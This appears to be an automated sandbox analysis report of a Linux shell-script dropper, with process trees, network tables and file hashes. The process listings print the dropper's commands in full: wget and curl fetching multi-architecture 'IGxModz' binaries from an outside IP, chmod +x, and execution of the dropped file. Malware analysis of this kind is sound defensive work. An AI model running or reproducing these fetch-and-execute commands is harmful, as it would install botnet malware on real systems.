Analysis Overview
SHA256
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1
Threat Level: Shows suspicious behavior
The file f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh was found to show suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-21 08:50
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 08:50
Reported
2024-11-21 08:54
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
2s
Max time network
131s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /tmp/3AvA | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /tmp/IGxModz.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3AvA | /tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh | N/A |
| File opened for modification | /tmp/IGxModz.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.sh4 | /usr/bin/curl | N/A |
Processes
/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.x86]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.x86]
/bin/cat
[cat IGxModz.x86]
/bin/chmod
[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]
/tmp/3AvA
[./3AvA x86]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.mips]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.mips]
/bin/cat
[cat IGxModz.mips]
/bin/chmod
[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]
/tmp/3AvA
[./3AvA mips]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.mpsl]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.mpsl]
/bin/cat
[cat IGxModz.mpsl]
/bin/chmod
[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]
/tmp/3AvA
[./3AvA mpsl]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm4]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm4]
/bin/cat
[cat IGxModz.arm4]
/bin/chmod
[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]
/tmp/3AvA
[./3AvA arm4]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm5]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm5]
/bin/cat
[cat IGxModz.arm5]
/bin/chmod
[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]
/tmp/3AvA
[./3AvA arm5]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm6]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm6]
/bin/cat
[cat IGxModz.arm6]
/bin/chmod
[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]
/tmp/3AvA
[./3AvA arm6]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm7]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm7]
/bin/cat
[cat IGxModz.arm7]
/bin/chmod
[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]
/tmp/3AvA
[./3AvA arm7]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.ppc]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.ppc]
/bin/cat
[cat IGxModz.ppc]
/bin/chmod
[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]
/tmp/3AvA
[./3AvA ppc]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.m68k]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.m68k]
/bin/cat
[cat IGxModz.m68k]
/bin/chmod
[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]
/tmp/3AvA
[./3AvA m68k]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.sh4]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.sh4]
/bin/cat
[cat IGxModz.sh4]
/bin/chmod
[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]
/tmp/3AvA
[./3AvA sh4]
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| N/A | 224.0.0.251:5353 | | udp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| US | 151.101.193.91:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| GB | 89.187.167.6:443 | | tcp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
Files
/tmp/IGxModz.x86
| Hash | Value |
| --- | --- |
| MD5 | 960b4fa9d5383373f0a1ea04929df01b |
| SHA1 | f78054d817db7742162a706b5d9f1fedcdf21140 |
| SHA256 | 3e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a |
| SHA512 | 2d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-21 08:50
Reported
2024-11-21 08:54
Platform
debian9-armhf-20240729-en
Max time kernel
8s
Max time network
9s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /tmp/3AvA | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /tmp/3AvA | /tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh | N/A |
| File opened for modification | /tmp/IGxModz.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.m68k | /usr/bin/curl | N/A |
Processes
/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.x86]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.x86]
/bin/cat
[cat IGxModz.x86]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]
/tmp/3AvA
[./3AvA x86]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.mips]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.mips]
/bin/cat
[cat IGxModz.mips]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]
/tmp/3AvA
[./3AvA mips]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.mpsl]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.mpsl]
/bin/cat
[cat IGxModz.mpsl]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]
/tmp/3AvA
[./3AvA mpsl]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm4]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm4]
/bin/cat
[cat IGxModz.arm4]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]
/tmp/3AvA
[./3AvA arm4]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm5]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm5]
/bin/cat
[cat IGxModz.arm5]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]
/tmp/3AvA
[./3AvA arm5]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm6]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm6]
/bin/cat
[cat IGxModz.arm6]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]
/tmp/3AvA
[./3AvA arm6]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm7]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm7]
/bin/cat
[cat IGxModz.arm7]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]
/tmp/3AvA
[./3AvA arm7]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.ppc]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.ppc]
/bin/cat
[cat IGxModz.ppc]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]
/tmp/3AvA
[./3AvA ppc]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.m68k]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.m68k]
/bin/cat
[cat IGxModz.m68k]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]
/tmp/3AvA
[./3AvA m68k]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.sh4]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.sh4]
/bin/cat
[cat IGxModz.sh4]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]
/tmp/3AvA
[./3AvA sh4]
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
Files
/tmp/IGxModz.x86
| Hash | Value |
| --- | --- |
| MD5 | 960b4fa9d5383373f0a1ea04929df01b |
| SHA1 | f78054d817db7742162a706b5d9f1fedcdf21140 |
| SHA256 | 3e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a |
| SHA512 | 2d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-21 08:50
Reported
2024-11-21 08:54
Platform
debian9-mipsbe-20240611-en
Max time kernel
29s
Max time network
31s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
